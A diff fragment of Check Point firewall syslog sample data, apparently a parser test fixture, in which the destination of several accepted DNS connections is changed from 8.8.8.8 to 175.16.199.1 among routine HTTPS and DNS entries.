ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52899"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42262"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60774"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44650"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36668"; service:"443"; service_id:"https"; src:"192.168.2.2"]
@@ -2577,63 +2577,63 @@
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d917,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61480"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10006"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57384"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.130"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34578"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39194"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59478"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44683"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39194"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59478"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44683"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x15,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.66"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48744"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x16,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.95"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50252"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x17,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43097"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x18,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"26"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33254"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x19,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"27"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55117"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x17,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43097"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x18,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"26"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33254"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x19,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"27"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55117"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1a,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"28"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37870"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1b,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"29"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.175"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39088"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1c,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"30"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.80"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46420"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"31"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"31"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1e,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"32"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.38"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43484"; service:"443"; service_id:"https"; src:"192.168.2.2"]
